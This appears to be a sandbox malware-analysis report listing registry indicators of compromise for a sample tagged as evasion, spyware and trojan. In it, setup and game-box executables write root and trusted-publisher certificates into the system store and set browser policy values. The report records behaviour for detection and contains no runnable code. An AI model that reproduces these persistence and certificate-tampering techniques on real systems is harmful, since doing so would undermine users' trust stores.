Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 033589468b96d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\adfreevision.com\Total = "76"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "438"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "478"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{3FE80A8A-997D-4B48-B39E-1DBCE172A1E1} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000e93f7fe209c35de5b375f380c2a98e897929d8454d561a16decba7bf2277f3b6515164ecd22e86d45d5273b3fdd79027021f2841d89987423479	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node	Setup.tmp
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2b3621958996d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "406"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\adfreevision.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "98"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhotfeed.com\Total = "850"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhotfeed.com\Total = "159"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Setup.exeSetup.tmpGameBoxWin64.exeSetup (19).exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	Setup.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	GameBoxWin64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	GameBoxWin64.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	GameBoxWin64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	GameBoxWin64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	Setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	GameBoxWin64.exe
